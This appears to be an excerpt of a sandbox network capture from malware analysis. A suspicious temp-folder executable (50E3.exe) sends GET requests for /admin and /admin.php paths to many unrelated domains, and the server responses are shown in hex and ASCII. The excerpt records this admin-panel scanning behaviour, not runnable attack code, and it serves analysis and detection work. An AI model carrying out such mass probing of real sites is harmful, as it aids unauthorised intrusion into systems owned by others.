Nov 30, 2023 11:22:44.602968931 CET	217	OUT	GET / HTTP/1.1 Host: www.hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.783035040 CET	1340	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:22:44 GMT Server: Apache/2.4.57 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:44 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=o21hgt8lseduevueg6o14ge177; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1625 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI
Nov 30, 2023 11:22:44.783052921 CET	833	IN	Data Raw: ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 Data Ascii: 0&qUQmptnAq#Voj}!-5MjnOB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<
Nov 30, 2023 11:22:45.315268040 CET	295	OUT	GET / HTTP/1.1 Host: www.hul.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=o21hgt8lseduevueg6o14ge177 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://www.hul.co.uk/
Nov 30, 2023 11:22:45.494985104 CET	1340	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:22:45 GMT Server: Apache/2.4.57 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:45 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1625 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI0&qUQmptnAq#Voj}!-5Mjn
Nov 30, 2023 11:22:45.495007992 CET	775	IN	Data Raw: 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 10 2e e0 26 e3 a6 9a 73 62 f7 71 6d 5c 38 1e 9a b5 c3 30 93 38 bd 26 72 1b d2 6f a5 b1 bf 1e f5 89 8b fa 6e 8c f8 82 e2 23 be 43 cb 05 18 49 c2 84 d0 39 f1 a1 62 12 a2 93 04 Data Ascii: OB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<%A^yO;8V]wtSGx=V:^SZq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
208	192.168.2.4	51475	15.197.204.56	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:44.677896023 CET	216	OUT	GET /admin HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.778265953 CET	874	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_V4cJSujL/MY6FiD6HoU1A338AW8ZvUCt9A0Fdc+GzMDfeJLpqPvByRAmfiYmWS9aVV3qaHZRJzqLxncwjIz7+w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:44.983139038 CET	874	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_V4cJSujL/MY6FiD6HoU1A338AW8ZvUCt9A0Fdc+GzMDfeJLpqPvByRAmfiYmWS9aVV3qaHZRJzqLxncwjIz7+w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
209	192.168.2.4	51476	15.197.142.173	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:44.677980900 CET	217	OUT	GET /admin/ HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.789015055 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-167.ec2.internal X-Request-Id: 99a6ae9e-277c-410c-a7e7-f9d61b63045e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
210	192.168.2.4	51473	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:44.687355042 CET	225	OUT	GET /admin.php HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.801273108 CET	564	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.651070=c0a7702e-6d29-47d2-bb74-8d84b97030e0; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:17 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
211	192.168.2.4	50787	157.7.44.171	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:44.739044905 CET	218	OUT	GET /admin HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.004771948 CET	653	IN	HTTP/1.1 401 Unauthorized Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 381 Connection: keep-alive Server: Apache WWW-Authenticate: Basic realm="" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
212	192.168.2.4	51971	13.248.169.48	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:44.892986059 CET	221	OUT	GET /admin/ HTTP/1.1 Host: ct.ated.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:44.992377996 CET	1340	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html Content-Length: 12477 Last-Modified: Mon, 13 Nov 2023 23:32:46 GMT Connection: keep-alive ETag: "6552b21e-30bd" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_O4/o5pQfpG+qC3H2YZ5na9WK3WqM3rtoaifLxQAgxT0M4CheYujvYQTYHn9IZE6o0oKlVY+cNBQBFv67oHOIAA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.58;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><noscript><style>#content-main { display: none; }</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://www.enable-javascript.com/">instructions how to enable JavaScript in your we
Nov 30, 2023 11:22:44.992393970 CET	1340	IN	Data Raw: 62 20 62 72 6f 77 73 65 72 3c 2f 61 3e 2e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 61 62 70 20 3d 20 75 6e 64 65 66 69 6e 65 64 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f Data Ascii: b browser</a>.</div></noscript><script>var abp = undefined;</script><script src="/px.js?ch=1&abp=1"></script><script src="/px.js?ch=2&abp=1"></script><script>!function(){"use strict";var e={49040:function(e,t,n){function r(e){return!0===e\|\|"tr
Nov 30, 2023 11:22:44.992408991 CET	378	IN	Data Raw: 2e 6c 6f 67 4d 65 73 73 61 67 65 28 65 2e 4c 65 76 65 6c 2e 45 52 52 4f 52 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 77 61 72 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 6c 6f 67 4d 65 73 73 61 67 65 28 65 Data Ascii: .logMessage(e.Level.ERROR,t)}},{key:"warn",value:function(t){return e.logMessage(e.Level.WARN,t)}},{key:"info",value:function(t){return e.logMessage(e.Level.INFO,t)}},{key:"debug",value:function(t){return e.logMessage(e.Level.DEBUG,t)}},{key:"
Nov 30, 2023 11:22:44.992424965 CET	1340	IN	Data Raw: 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 61 2e 65 72 72 6f 72 28 74 29 Data Ascii: (e){if("object"===typeof e)try{return JSON.stringify(e)}catch(t){return a.error(t),e}return Array.isArray(e)?e.toString():e}a.Level={NONE:"NONE",ERROR:"ERROR",WARN:"WARN",INFO:"INFO",DEBUG:"DEBUG",TRACE:"TRACE"},a.Severity={NONE:0,ERROR:1,WARN
